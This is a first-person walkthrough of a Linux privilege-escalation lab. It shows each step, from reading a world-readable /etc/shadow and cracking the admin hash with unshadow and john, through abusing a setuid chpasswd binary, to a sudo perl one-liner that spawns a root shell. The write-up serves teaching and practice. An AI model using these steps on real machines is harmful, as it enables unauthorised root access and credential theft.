The Challenge

So you’ve got a foothold on a regular user account on a Linux box? You’ve tried to escalate privileges to root but nothing seems to work? Keep in mind that many a time, you might have to escalate first to another non-root user with some privileges on the system and then try to escalate to root! Sometimes the user is the weakest part of the security chain! All required tools are available on the lab system.

Your mission is to get a root shell on the box! 

Challenge Accepted

First we ls -la, nothing, so let’s try ls -la /. We see /wordlist and when we check it out we see a gunzipped rockyou.txt. I gunzip it and then know we have to bruteforce something, one of my first guesses was that it might be the shadow file, if I can read it then we know it’s the target.

student@attackdefense:/wordlist$ ls /wordlist/
mypasswd  rockyou.txt
student@attackdefense:/wordlist$ cat /etc/shadow
root:*:17764:0:99999:7:::
daemon:*:17764:0:99999:7:::
bin:*:17764:0:99999:7:::
sys:*:17764:0:99999:7:::
sync:*:17764:0:99999:7:::
games:*:17764:0:99999:7:::
man:*:17764:0:99999:7:::
lp:*:17764:0:99999:7:::
mail:*:17764:0:99999:7:::
news:*:17764:0:99999:7:::
uucp:*:17764:0:99999:7:::
proxy:*:17764:0:99999:7:::
www-data:*:17764:0:99999:7:::
backup:*:17764:0:99999:7:::
list:*:17764:0:99999:7:::
irc:*:17764:0:99999:7:::
gnats:*:17764:0:99999:7:::
nobody:*:17764:0:99999:7:::
_apt:*:17764:0:99999:7:::
student:!:17800::::::
admin:$1$B86AnBa6$JkxAjd1kSxBIW/4FeNy191:17800::::::
teacher:!:17800::::::

We can cat /etc/shadow, so I check for a common tool that is to convert shadow file hashes into a format we can use with john to crack, unshadow. We find unshadow so now we simply pass it passwd and shadow as arguments.

student@attackdefense:/wordlist$ unshadow /etc/passwd /etc/shadow > crackthis

Now time to use john and provide rockyou.txt as our wordlist and crackthis as the hash to crack.

student@attackdefense:/wordlist$ john --wordlist=rockyou.txt -show crackthis

It worked, now we have the password!

student@attackdefense:/wordlist$ su admin
Password:
admin@attackdefense:/wordlist$ whoami
admin

Now we’re in, let’s look around. .sudo_as_admin_successful stands out but do does the SETUID chpasswd owned by root, let’s try that.

admin@attackdefense:~$ ls -la
total 28
drwxr-x— 1 admin admin 4096 Mar 28 10:24 .
drwxr-xr-x 1 root root 4096 Sep 26 2018 ..
-rw——- 1 admin admin 17 Mar 28 10:30 .bash_history
-rw-r–r– 1 root root 0 Sep 26 2018 .sudo_as_admin_successful
-rwsr-xr-x 1 root root 8568 Sep 26 2018 chpasswd
admin@attackdefense:~$ ./chpasswd root
Invalid User!

It was worth a try, right? Let’s see if we can find valid usernames…

admin@attackdefense:~$ strings chpasswd | grep "Invalid User" -A ...
student
teacher
admin
...

Great, we found some valid users, we have been both student and admin, let’s try to change teacher’s password…

admin@attackdefense:~$ ./chpasswd teacher
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
admin@attackdefense:~$ su teacher
Password:

It worked, first things first, sudo -l.

teacher@attackdefense:/home/admin$ sudo -l
User teacher may run the following commands on attackdefense:
    (root) NOPASSWD: /usr/bin/perl

Awesome, we can run perl as root with no password, if you have seen some of my older posts you know what’s next, simply run perl with -e switch to execute /bin/sh as root, sweet!

teacher@attackdefense:/home/admin$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)

Game Over.